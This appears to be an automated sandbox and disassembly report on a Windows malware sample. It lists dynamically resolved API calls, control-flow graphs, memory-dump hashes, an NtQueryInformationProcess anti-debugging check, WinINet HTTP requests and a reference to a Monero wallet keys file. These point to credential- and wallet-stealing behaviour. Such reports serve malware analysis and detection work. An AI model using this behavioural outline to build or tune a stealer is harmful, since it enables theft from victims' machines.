                            • GetProcAddress.KERNEL32(74DD0000,00FB2B40), ref: 00359A70
                            • GetProcAddress.KERNEL32(74DD0000,00FA5450), ref: 00359A88
                            • LoadLibraryA.KERNEL32(00FB2B70,?,00356A00), ref: 00359A9A
                            • LoadLibraryA.KERNEL32(00FB2C60,?,00356A00), ref: 00359AAB
                            • LoadLibraryA.KERNEL32(00FB29A8,?,00356A00), ref: 00359ABD
                            • LoadLibraryA.KERNEL32(00FB29C0,?,00356A00), ref: 00359ACF
                            • LoadLibraryA.KERNEL32(00FB29D8,?,00356A00), ref: 00359AE0
                            • GetProcAddress.KERNEL32(75A70000,00FB2A08), ref: 00359B02
                            • GetProcAddress.KERNEL32(75290000,00FB2A38), ref: 00359B23
                            • GetProcAddress.KERNEL32(75290000,00FB2A50), ref: 00359B3B
                            • GetProcAddress.KERNEL32(75BD0000,00FB2A98), ref: 00359B5D
                            • GetProcAddress.KERNEL32(75450000,00FA54F0), ref: 00359B7E
                            • GetProcAddress.KERNEL32(76E90000,00FB98F8), ref: 00359B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00359BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00359BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
                            • Instruction ID: e6b83238ca2af01277eb418c40aa074ab618988316c6f535d4d2c7b71294388a
                            • Opcode Fuzzy Hash: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
                            • Instruction Fuzzy Hash: 08A15BB55002409FF348EFA8ED88A6637F9F768701704651BAE45F3225D739A44AFF22

                            Control-flow Graph (function at 003445C0)
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0034460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0034479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00344770 (the same string is referenced from 29 further locations in this function; duplicate entries omitted)
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, repeated once per xref)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 64b8212c52e7696cdbe1479303a96098566ba1d1030da1bbecb0962fe2976015
                            • Instruction ID: 7e158ea0ac7612999dc559f3a0d327aae8e645cf519f435fcd61821575978b28
                            • Opcode Fuzzy Hash: 64b8212c52e7696cdbe1479303a96098566ba1d1030da1bbecb0962fe2976015
                            • Instruction Fuzzy Hash: CA41F7606CA6047FE626FFA48C42EDD76665F47B08F609266EC02662C4DFB07711CF22

                            Control-flow Graph (function at 00344880)
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00344915
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 0034493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00360DDB,00000000,?,?,00000000,?,",00000000,?,00FBE8F8), ref: 00344DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00344E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00344E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00344E49
                            • InternetCloseHandle.WININET(00000000), ref: 00344EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00344EC5
                            • HttpOpenRequestA.WININET(00000000,00FBE808,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00344B15
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • InternetCloseHandle.WININET(00000000), ref: 00344ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: d36f861d965741e3353f251c713da8b731ea4cdccfc66d6795c73891b57efb6f
                            • Instruction ID: d91021983535b2ec174a55fbeccbcfa113ccd76f1c3ee7c791453d5059858bec
                            • Opcode Fuzzy Hash: d36f861d965741e3353f251c713da8b731ea4cdccfc66d6795c73891b57efb6f
                            • Instruction Fuzzy Hash: 7912BF719106189ADB16EB90DC52FEEB778BF14301F504299B9067A0A1EF702F4DEF62
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
                            • Instruction ID: 382db567b5f28807a282c879b7125c26bc07907a3d66d836a6c9018424b660b3
                            • Opcode Fuzzy Hash: f927972328d5242fb170dceca2be8a6afa4d6f51ef73a91377da31876a7f9417
                            • Instruction Fuzzy Hash: D4F04FB1944208ABD710DF98DD4AFAEBBBCEB04711F10025AFA05A2690C77415088BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
                            • Instruction ID: 12c7f7f02a108517f9236bcc2fd6dcc8033ba324cd04d8b331c8030b07bad9f4
                            • Opcode Fuzzy Hash: 11589211fc2ad4dd0cc0fb150febd5842a0c72f4972a1e82c145cc948d754480
                            • Instruction Fuzzy Hash: 18D05E7490030CDBDB00DFE0D8496DDBBB8FB08311F001555DD05B2340EA306486DBA6

                             Control-flow Graph (block id, address range, API calls made in the block, successor blocks)
                             • 633 359c10-359c1a -> 634, 635
                             • 634 35a036-35a0ca LoadLibraryA * 8 -> 636, 637
                             • 635 359c20-35a031 GetProcAddress * 43 -> 634
                             • 636 35a146-35a14d -> 638, 639
                             • 637 35a0cc-35a141 GetProcAddress * 5 -> 636
                             • 638 35a216-35a21d -> 640, 641
                             • 639 35a153-35a211 GetProcAddress * 8 -> 638
                             • 640 35a21f-35a293 GetProcAddress * 5 -> 641
                             • 641 35a298-35a29f -> 642, 643
                             • 642 35a2a5-35a332 GetProcAddress * 6 -> 643
                             • 643 35a337-35a33e -> 644, 645
                             • 644 35a344-35a41a GetProcAddress * 9 -> 645
                             • 645 35a41f-35a426 -> 646, 647
                             • 646 35a4a2-35a4a9 -> 648, 649
                             • 647 35a428-35a49d GetProcAddress * 5 -> 646
                             • 648 35a4dc-35a4e3 -> 650, 651
                             • 649 35a4ab-35a4d7 GetProcAddress * 2 -> 648
                             • 650 35a515-35a51c -> 652, 653
                             • 651 35a4e5-35a510 GetProcAddress * 2 -> 650
                             • 652 35a612-35a619 -> 654, 655
                             • 653 35a522-35a60d GetProcAddress * 10 -> 652
                             • 654 35a67d-35a684 -> 656, 657
                             • 655 35a61b-35a678 GetProcAddress * 4 -> 654
                             • 656 35a686-35a699 GetProcAddress -> 657
                             • 657 35a69e-35a6a5 -> 658, 659
                             • 658 35a6a7-35a703 GetProcAddress * 4 -> 659
                             • 659 35a708-35a709 (exit)
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00FA5530), ref: 00359C2D
                            • GetProcAddress.KERNEL32(74DD0000,00FA52F0), ref: 00359C45
                            • GetProcAddress.KERNEL32(74DD0000,00FBA0C8), ref: 00359C5E
                            • GetProcAddress.KERNEL32(74DD0000,00FBA0F8), ref: 00359C76
                            • GetProcAddress.KERNEL32(74DD0000,00FBA128), ref: 00359C8E
                            • GetProcAddress.KERNEL32(74DD0000,00FBA140), ref: 00359CA7
                            • GetProcAddress.KERNEL32(74DD0000,00FABA20), ref: 00359CBF
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4C8), ref: 00359CD7
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4B0), ref: 00359CF0
                            • GetProcAddress.KERNEL32(74DD0000,00FBD528), ref: 00359D08
                            • GetProcAddress.KERNEL32(74DD0000,00FBD450), ref: 00359D20
                            • GetProcAddress.KERNEL32(74DD0000,00FA5290), ref: 00359D39
                            • GetProcAddress.KERNEL32(74DD0000,00FA5550), ref: 00359D51
                            • GetProcAddress.KERNEL32(74DD0000,00FA5570), ref: 00359D69
                            • GetProcAddress.KERNEL32(74DD0000,00FA5590), ref: 00359D82
                            • GetProcAddress.KERNEL32(74DD0000,00FBD558), ref: 00359D9A
                            • GetProcAddress.KERNEL32(74DD0000,00FBD438), ref: 00359DB2
                            • GetProcAddress.KERNEL32(74DD0000,00FABAC0), ref: 00359DCB
                            • GetProcAddress.KERNEL32(74DD0000,00FA55B0), ref: 00359DE3
                            • GetProcAddress.KERNEL32(74DD0000,00FBD540), ref: 00359DFB
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4E0), ref: 00359E14
                            • GetProcAddress.KERNEL32(74DD0000,00FBD468), ref: 00359E2C
                            • GetProcAddress.KERNEL32(74DD0000,00FBD570), ref: 00359E44
                            • GetProcAddress.KERNEL32(74DD0000,00FA52B0), ref: 00359E5D
                            • GetProcAddress.KERNEL32(74DD0000,00FBD588), ref: 00359E75
                            • GetProcAddress.KERNEL32(74DD0000,00FBD4F8), ref: 00359E8D
                            • GetProcAddress.KERNEL32(74DD0000,00FBD3D8), ref: 00359EA6
                            • GetProcAddress.KERNEL32(74DD0000,00FBD420), ref: 00359EBE
                            • GetProcAddress.KERNEL32(74DD0000,00FBD3F0), ref: 00359ED6
                            • GetProcAddress.KERNEL32(74DD0000,00FBD498), ref: 00359EEF
                            • GetProcAddress.KERNEL32(74DD0000,00FBD408), ref: 00359F07
                            • GetProcAddress.KERNEL32(74DD0000,00FBD480), ref: 00359F1F
                            • GetProcAddress.KERNEL32(74DD0000,00FBD510), ref: 00359F38
                            • GetProcAddress.KERNEL32(74DD0000,00FB13F0), ref: 00359F50
                            • GetProcAddress.KERNEL32(74DD0000,00FBD018), ref: 00359F68
                            • GetProcAddress.KERNEL32(74DD0000,00FBCEC8), ref: 00359F81
                            • GetProcAddress.KERNEL32(74DD0000,00FA5210), ref: 00359F99
                            • GetProcAddress.KERNEL32(74DD0000,00FBD048), ref: 00359FB1
                            • GetProcAddress.KERNEL32(74DD0000,00FA5230), ref: 00359FCA
                            • GetProcAddress.KERNEL32(74DD0000,00FBCFD0), ref: 00359FE2
                            • GetProcAddress.KERNEL32(74DD0000,00FBD078), ref: 00359FFA
                            • GetProcAddress.KERNEL32(74DD0000,00FA5390), ref: 0035A013
                            • GetProcAddress.KERNEL32(74DD0000,00FA5850), ref: 0035A02B
                            • LoadLibraryA.KERNEL32(00FBCFE8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A03D
                            • LoadLibraryA.KERNEL32(00FBD0A8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A04E
                            • LoadLibraryA.KERNEL32(00FBCF28,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A060
                            • LoadLibraryA.KERNEL32(00FBCF88,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A072
                            • LoadLibraryA.KERNEL32(00FBCE08,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A083
                            • LoadLibraryA.KERNEL32(00FBCF58,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A095
                            • LoadLibraryA.KERNEL32(00FBD060,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0A7
                            • LoadLibraryA.KERNEL32(00FBCFB8,?,00355CA3,00360AEB,?,?,?,?,?,?,?,?,?,?,00360AEA,00360AE3), ref: 0035A0B8
                            • GetProcAddress.KERNEL32(75290000,00FA5670), ref: 0035A0DA
                            • GetProcAddress.KERNEL32(75290000,00FBCE20), ref: 0035A0F2
                            • GetProcAddress.KERNEL32(75290000,00FB99A8), ref: 0035A10A
                            • GetProcAddress.KERNEL32(75290000,00FBD0C0), ref: 0035A123
                            • GetProcAddress.KERNEL32(75290000,00FA5650), ref: 0035A13B
                            • GetProcAddress.KERNEL32(734C0000,00FAB958), ref: 0035A160
                            • GetProcAddress.KERNEL32(734C0000,00FA5710), ref: 0035A179
                            • GetProcAddress.KERNEL32(734C0000,00FABBD8), ref: 0035A191
                            • GetProcAddress.KERNEL32(734C0000,00FBCEE0), ref: 0035A1A9
                            • GetProcAddress.KERNEL32(734C0000,00FBCDF0), ref: 0035A1C2
                            • GetProcAddress.KERNEL32(734C0000,00FA5610), ref: 0035A1DA
                            • GetProcAddress.KERNEL32(734C0000,00FA59B0), ref: 0035A1F2
                            • GetProcAddress.KERNEL32(734C0000,00FBD000), ref: 0035A20B
                            • GetProcAddress.KERNEL32(752C0000,00FA5930), ref: 0035A22C
                            • GetProcAddress.KERNEL32(752C0000,00FA58B0), ref: 0035A244
                            • GetProcAddress.KERNEL32(752C0000,00FBCEF8), ref: 0035A25D
                            • GetProcAddress.KERNEL32(752C0000,00FBCE38), ref: 0035A275
                            • GetProcAddress.KERNEL32(752C0000,00FA5870), ref: 0035A28D
                            • GetProcAddress.KERNEL32(74EC0000,00FABC28), ref: 0035A2B3
                            • GetProcAddress.KERNEL32(74EC0000,00FAB818), ref: 0035A2CB
                            • GetProcAddress.KERNEL32(74EC0000,00FBCF10), ref: 0035A2E3
                            • GetProcAddress.KERNEL32(74EC0000,00FA5690), ref: 0035A2FC
                            • GetProcAddress.KERNEL32(74EC0000,00FA5810), ref: 0035A314
                            • GetProcAddress.KERNEL32(74EC0000,00FABAE8), ref: 0035A32C
                            • GetProcAddress.KERNEL32(75BD0000,00FBCE98), ref: 0035A352
                            • GetProcAddress.KERNEL32(75BD0000,00FA58D0), ref: 0035A36A
                            • GetProcAddress.KERNEL32(75BD0000,00FB99B8), ref: 0035A382
                            • GetProcAddress.KERNEL32(75BD0000,00FBD030), ref: 0035A39B
                            • GetProcAddress.KERNEL32(75BD0000,00FBCDD8), ref: 0035A3B3
                            • GetProcAddress.KERNEL32(75BD0000,00FA5730), ref: 0035A3CB
                            • GetProcAddress.KERNEL32(75BD0000,00FA5790), ref: 0035A3E4
                            • GetProcAddress.KERNEL32(75BD0000,00FBCF40), ref: 0035A3FC
                            • GetProcAddress.KERNEL32(75BD0000,00FBD090), ref: 0035A414
                            • GetProcAddress.KERNEL32(75A70000,00FA5950), ref: 0035A436
                            • GetProcAddress.KERNEL32(75A70000,00FBCE50), ref: 0035A44E
                            • GetProcAddress.KERNEL32(75A70000,00FBCE68), ref: 0035A466
                            • GetProcAddress.KERNEL32(75A70000,00FBCE80), ref: 0035A47F
                            • GetProcAddress.KERNEL32(75A70000,00FBCEB0), ref: 0035A497
                            • GetProcAddress.KERNEL32(75450000,00FA5830), ref: 0035A4B8
                            • GetProcAddress.KERNEL32(75450000,00FA5890), ref: 0035A4D1
                            • GetProcAddress.KERNEL32(75DA0000,00FA56B0), ref: 0035A4F2
                            • GetProcAddress.KERNEL32(75DA0000,00FBCF70), ref: 0035A50A
                            • GetProcAddress.KERNEL32(6F070000,00FA5630), ref: 0035A530
                            • GetProcAddress.KERNEL32(6F070000,00FA58F0), ref: 0035A548
                            • GetProcAddress.KERNEL32(6F070000,00FA56D0), ref: 0035A560
                            • GetProcAddress.KERNEL32(6F070000,00FBCFA0), ref: 0035A579
                            • GetProcAddress.KERNEL32(6F070000,00FA56F0), ref: 0035A591
                            • GetProcAddress.KERNEL32(6F070000,00FA5990), ref: 0035A5A9
                            • GetProcAddress.KERNEL32(6F070000,00FA5910), ref: 0035A5C2
                            • GetProcAddress.KERNEL32(6F070000,00FA5750), ref: 0035A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0035A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0035A607
                            • GetProcAddress.KERNEL32(75AF0000,00FBD318), ref: 0035A629
                            • GetProcAddress.KERNEL32(75AF0000,00FB9A28), ref: 0035A641
                            • GetProcAddress.KERNEL32(75AF0000,00FBD180), ref: 0035A659
                            • GetProcAddress.KERNEL32(75AF0000,00FBD270), ref: 0035A672
                            • GetProcAddress.KERNEL32(75D90000,00FA57B0), ref: 0035A693
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD1B0), ref: 0035A6B4
                            • GetProcAddress.KERNEL32(6FAA0000,00FA5770), ref: 0035A6CD
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD138), ref: 0035A6E5
                            • GetProcAddress.KERNEL32(6FAA0000,00FBD330), ref: 0035A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
                            • Instruction ID: 5f595d607e350146fb3b888d74f6efb0bef7f945ad9256e13b127d0814fd3ab6
                            • Opcode Fuzzy Hash: 81016bdce039d4f7afe0de30ded6eb0bc9ef79ed7973c29820d17aa901e3b369
                            • Instruction Fuzzy Hash: 2A627DB5500200AFF748DFA8ED8896637F9F76C701304A51BAE45E3225D739A45AFF22

                             Control-flow Graph (block id, address range, calls made in the block, successor blocks)
                             • 1033 346280-34630b call 35a7a0 call 3447b0 call 35a740 InternetOpenA StrCmpCA -> 1040, 1041
                             • 1040 346314-346318 -> 1042, 1043
                             • 1041 34630d -> 1040
                             • 1042 34631e-346342 InternetConnectA -> 1044, 1045
                             • 1043 346509-346525 call 35a7a0 call 35a800 * 2 -> 1061
                             • 1044 3464ff-346503 InternetCloseHandle -> 1043
                             • 1045 346348-34634c -> 1047, 1048
                             • 1047 34634e-346358 -> 1050
                             • 1048 34635a -> 1050
                             • 1050 346364-346392 HttpOpenRequestA -> 1052, 1053
                             • 1052 3464f5-3464f9 InternetCloseHandle -> 1044
                             • 1053 346398-34639c -> 1056, 1057
                             • 1056 3463c5-346405 HttpSendRequestA HttpQueryInfoA -> 1059, 1060
                             • 1057 34639e-3463bf InternetSetOptionA -> 1056
                             • 1059 346407-346427 call 35a740 call 35a800 * 2 -> 1061
                             • 1060 34642c-34644b call 358940 -> 1066, 1067
                             • 1061 346528-34652d (exit)
                             • 1066 34644d-346454 -> 1070, 1071
                             • 1067 3464c9-3464e9 call 35a740 call 35a800 * 2 -> 1061
                             • 1070 346456-346480 InternetReadFile -> 1076, 1077
                             • 1071 3464c7-3464ef InternetCloseHandle -> 1052
                             • 1076 346482-346489 -> 1077, 1080
                             • 1077 34648b -> 1071
                             • 1080 34648d-3464c5 call 35a9b0 call 35a8a0 call 35a800 -> 1070
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003463FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0034646D
                            • InternetCloseHandle.WININET(00000000), ref: 003464EF
                            • InternetCloseHandle.WININET(00000000), ref: 003464F9
                            • InternetCloseHandle.WININET(00000000), ref: 00346503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
